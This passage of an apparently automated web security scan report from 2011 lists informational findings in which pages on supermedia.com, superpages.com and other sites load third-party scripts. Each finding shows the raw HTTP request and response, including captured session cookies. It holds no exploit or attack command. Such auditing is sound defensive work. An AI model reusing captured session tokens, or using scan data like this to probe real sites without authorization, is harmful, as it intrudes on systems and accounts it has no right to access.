<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.345. https://www.supermedia.com/packaged-solutions/business-profile-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /packaged-solutions/business-profile-packages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /packaged-solutions/business-profile-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Business Profile Packages | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.346. https://www.supermedia.com/packaged-solutions/multi-product-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /packaged-solutions/multi-product-packages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /packaged-solutions/multi-product-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Multi-Product Marketing Packages | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.347. https://www.supermedia.com/press  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /press

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Press Releases | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.348. https://www.supermedia.com/print-advertising/white-pages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /print-advertising/white-pages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /print-advertising/white-pages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>White Pages Advertising | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.349. https://www.supermedia.com/print-advertising/yellow-pages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /print-advertising/yellow-pages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /print-advertising/yellow-pages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Yellow Pages Advertising | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.350. https://www.supermedia.com/reputation-monitoring  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /reputation-monitoring

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /reputation-monitoring HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Reputation Monitoring | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.351. https://www.supermedia.com/social-responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /social-responsibility

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /social-responsibility HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Social Responsibility | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.352. https://www.supermedia.com/spportal/landingpages.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/landingpages.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /spportal/landingpages.do?splash=401 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:28:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 5028
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperMedia
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

19.353. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: http://www.supermedia.com/support/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762103|check#true#1296760303; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:23 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 28573


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Company Support | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.354. https://www.supermedia.com/support/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /support/contact-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/contact-us HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Contact SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.355. https://www.supermedia.com/support/site-map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /support/site-map

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/site-map HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Site Map | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.356. https://www.supermedia.com/trust/privacy-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /trust/privacy-security

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /trust/privacy-security HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Privacy Policy | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.357. https://www.supermedia.com/trust/social-media-content-disclaimer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /trust/social-media-content-disclaimer

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /trust/social-media-content-disclaimer HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Social Media Content Disclaimer | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.358. https://www.supermedia.com/trust/terms-of-use  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /trust/terms-of-use

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /trust/terms-of-use HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Terms of Use | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.359. https://www.supermedia.com/video-ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /video-ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /video-ads HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Video Ads | SuperMedia.com Advertising</title>


<li
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.360. https://www.supermedia.com/web-design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /web-design

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web-design HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Design | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.361. https://www.supermedia.com/web-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /web-hosting

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web-hosting HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:31:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Web Hosting | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.362. https://www.supermedia.com/web-sites  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /web-sites

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web-sites HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:05 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Business Web Sites | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.363. http://www.superpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:12 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:12 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

19.364. http://www.thefutoncritic.com/devwatch/wright-vs-wrong/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefutoncritic.com
Path:   /devwatch/wright-vs-wrong/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /devwatch/wright-vs-wrong/x22 HTTP/1.1
Host: www.thefutoncritic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kzhsyk55h14dmof1ovtfne55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:29:43 GMT
Connection: close
Content-Length: 20828

<html>
<head>
<title>Shows A-Z - wright vs wrong on abc | TheFutonCritic.com</title>
<meta id="Meta_Description" name="Description" content="wright vs wrong on abc ... TheFutonCritic.com has wright
...[SNIP]...
</script>

<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=G07610&bpid=S0268"></script>
...[SNIP]...

19.365. http://www.thumbshots.net/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.net
Path:   /search.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search.aspx?q= HTTP/1.1
Host: www.thumbshots.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: .THUMBSHOTSNETASPXANONYMOUS=ezpDrHr6ywEkAAAAZDNlNWYyZDQtMzg4Yy00NmI1LTg2NGUtZDhmNjVhY2M1ZGU00; expires=Thu, 14-Apr-2011 08:05:09 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: .THUMBSHOTSNETASPXANONYMOUS=ezpDrHr6ywEkAAAAZDNlNWYyZDQtMzg4Yy00NmI1LTg2NGUtZDhmNjVhY2M1ZGU00; expires=Thu, 14-Apr-2011 08:05:09 GMT; path=/; HttpOnly
